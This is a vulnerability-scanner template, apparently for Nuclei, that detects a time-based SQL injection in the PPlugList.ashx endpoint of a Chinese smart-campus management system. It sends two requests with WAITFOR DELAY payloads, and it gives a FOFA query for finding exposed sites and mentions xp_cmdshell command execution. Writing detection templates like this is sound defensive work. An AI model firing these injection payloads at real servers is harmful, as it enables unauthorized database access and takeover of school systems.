http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      matchers-condition: and
      raw:
        - |
          GET /Module/CJGL/Controller/PPlugList.ashx?action=find&PlugIdentID=1';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
        - |
          GET /Module/CJGL/Controller/PPlugList.ashx?action=find&PlugIdentID=1';WAITFOR+DELAY+'0:0:8'-- HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
id: anxiaoyi-PPlugList_ashx-sql-time
info:
    author: Superhero
    description: |-
        fofa: title="智慧综合管理平台登入"
        智慧校园(安校易)管理系统 PPlugList.ashx 接口处存在SQL注入漏洞，未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
    name: 智慧校园(安校易)管理系统 PPlugList.ashx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/MoOGA-IF3C3Ed6tfvsS8Ew
    severity: high
    tags: []
